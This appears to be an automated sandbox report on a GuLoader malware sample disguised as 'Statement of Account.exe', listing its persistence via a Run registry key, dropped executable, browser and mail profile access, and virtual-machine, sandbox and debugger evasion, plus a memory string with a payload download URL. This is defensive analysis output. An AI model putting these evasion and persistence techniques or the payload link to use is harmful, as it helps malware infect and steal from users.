Source: C:\Users\user\Desktop\Statement of Account.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Statement of Account.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe 'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe'
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe 'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe'
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Statement of Account.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Statement of Account.exe'			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Queries process information (via WMI, Win32_Process)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Creates files inside the user directory

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Roaming\DnDcR

Jump to behavior

Classification label

Source: classification engine

Classification label: mal100.rans.spre.troj.adwa.spyw.evad.winEXE@8/6@3/3

Reads ini files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll			Jump to behavior

Creates mutexes

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1544:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3088:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1544:304:WilStaging_02

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: RegAsm.pdb source: DnDcR.exe, DnDcR.exe.9.dr
Source:	Binary string: RegAsm.pdb4 source: DnDcR.exe, 0000000E.00000002.48160223360.0000000000142000.00000002.00020000.sdmp, DnDcR.exe, 00000010.00000002.48240148335.00000000000D2000.00000002.00020000.sdmp, DnDcR.exe.9.dr

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.47854626661.0000000002260000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 1_2_00404E6E push esp; retf		1_2_00404E8E
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 1_2_00407C85 push C8F569B9h; ret		1_2_00407C8A
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 1_2_00403E8E push esi; retf		1_2_00403E95
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 1_2_0226020A push 02417304h; ret		1_2_0226020F
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 1_2_02260E76 push edx; iretd		1_2_02260E77
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 1_2_02262076 push ebp; retf		1_2_02262077
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0133261F push edi; retn 0000h		9_2_01332621
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Code function: 14_2_00144289 push es; retf		14_2_00144294
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Code function: 14_2_001444A3 push es; retf		14_2_001444A4
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Code function: 14_2_00144469 push cs; retf		14_2_0014449E
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Code function: 16_2_000D4289 push es; retf		16_2_000D4294
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Code function: 16_2_000D4469 push cs; retf		16_2_000D449E
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Code function: 16_2_000D44A3 push es; retf		16_2_000D44A4

Binary may include packed or encrypted code

Source: initial sample

Static PE information: section name: .text entropy: 6.81553512761

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe

Jump to dropped file

Boot Survival:

Creates an autostart registry key

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DnDcR			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DnDcR			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe:Zone.Identifier read attributes | delete

Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Users\user\Desktop\Statement of Account.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Statement of Account.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Statement of Account.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Statement of Account.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Statement of Account.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Statement of Account.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Statement of Account.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Statement of Account.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Statement of Account.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Statement of Account.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Source: C:\Users\user\Desktop\Statement of Account.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Users\user\Desktop\Statement of Account.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Statement of Account.exe, 00000001.00000002.47853987549.00000000005F4000.00000004.00000020.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEY
Source: Statement of Account.exe, 00000001.00000002.47854827996.0000000002A50000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
Source: Statement of Account.exe, 00000001.00000002.47854827996.0000000002A50000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52055392488.0000000001500000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: RegAsm.exe, 00000009.00000002.52055392488.0000000001500000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1KLPTPDRT8A5OLFK0QZPESH4W5UTNFBMH

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1536	Thread sleep time: -2767011611056431s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe TID: 5204	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe TID: 3624	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Window / User API: threadDelayed 9924

Jump to behavior

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Queries a list of all running processes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Contains medium sleeps (>= 30s)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Queries a list of all running drivers

Source: C:\Users\user\Desktop\Statement of Account.exe

System information queried: ModuleInformation

Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: Statement of Account.exe, 00000001.00000002.47856062180.00000000047D9000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: RegAsm.exe, 00000009.00000002.52055783599.00000000015E8000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW$e
Source: Statement of Account.exe, 00000001.00000002.47856062180.00000000047D9000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: RegAsm.exe, 00000009.00000002.52055392488.0000000001500000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh
Source: RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: Statement of Account.exe, 00000001.00000002.47856062180.00000000047D9000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Statement of Account.exe, 00000001.00000002.47854827996.0000000002A50000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
Source: Statement of Account.exe, 00000001.00000002.47856062180.00000000047D9000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: Statement of Account.exe, 00000001.00000002.47856062180.00000000047D9000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: RegAsm.exe, 00000009.00000002.52056281072.000000000164E000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: Statement of Account.exe, 00000001.00000002.47854827996.0000000002A50000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52055392488.0000000001500000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Statement of Account.exe, 00000001.00000002.47856062180.00000000047D9000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: Statement of Account.exe, 00000001.00000002.47856062180.00000000047D9000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: Statement of Account.exe, 00000001.00000002.47856062180.00000000047D9000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: Statement of Account.exe, 00000001.00000002.47853987549.00000000005F4000.00000004.00000020.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exeY
Source: RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers

Source: C:\Users\user\Desktop\Statement of Account.exe	Thread information set: HideFromDebugger			Jump to behavior
